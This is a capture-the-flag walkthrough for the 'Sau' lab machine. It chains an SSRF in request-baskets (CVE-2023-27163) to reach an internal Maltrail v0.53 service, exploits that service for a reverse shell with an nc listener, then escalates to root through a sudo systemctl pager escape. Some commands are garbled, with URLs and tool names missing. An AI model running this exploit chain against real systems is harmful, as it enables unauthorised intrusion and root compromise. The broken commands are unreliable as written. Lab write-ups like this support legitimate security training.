sudo vim /etc/hosts
# map sau.htb to target IP
nmap -T4 -p- -A -Pn -v sau.htb
Open ports & services:
- 22/tcp - ssh - OpenSSH 8.2p1 Ubuntu 4ubuntu0.7
- 55555/tcp - unknown
From the
scan, we have a lot of filtered, unknown services - these may be internal services that we can't access yet -
The service running on port 55555 is not recognised; we can try interacting with it using
or the browser -
On navigating to http://sau.htb:55555, on /web, we get a website to "create a basket to collect & inspect HTTP requests" - this is powered by
, v1.2.1 -
Directory scan:
feroxbuster -u http://sau.htb:55555 -w /usr/share/dirb/wordlists/common.txt -x php,html,bak,bac,md,jpg,png,ps1,js,txt,json,docx,pdf,zip,cgi,sh,pl,aspx,sql,xml --extract-links --scan-limit 2 --filter-status 400,401,404,405,500 --silent
On searching for any exploits associated with the version of
, we get a SSRF vuln CVE-2023-27163 -
According to the exploit, we can specify unintended services (such as network-closed apps, running on target localhost) to be accessed by the web app on port 55555; we can check for a few internal services which were filtered in the scan:
wget chmod +x ./ http://sau.htb:55555/ http://localhost:80/ # this creates a basket 'fuvgnd' # it will make the request to the internal service on port 80
Now, if we access http://sau.htb:55555/fuvgnd, we can see the internal service on port 80, which is running Maltrail v0.53
This version of Maltrail has an exploit associated with it:
wget -O # setup listener nc -nvlp 4444 python3 4444 http://sau.htb:55555/fuvgnd # this gives us a reverse shell
Now, we have a reverse shell as user 'puma':
# for stable reverse shell export TERM=xterm # Ctrl + Z to background shell stty raw -echo; fg # press Enter twice id # puma ls -la /home ls -la /home/puma # get user flag # check for privesc vectors sudo -l # puma can run this command as root # (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
Checking on GTFOBins, we have a local privesc vuln for systemctl, associated with CVE-2023-26604 - this can get us root:
# run the sudo command sudo /usr/bin/systemctl status trail.service # this launches the output in the 'less' pager - we can execute commands here !sh # this launches root shell ls -la /root/ # get root flag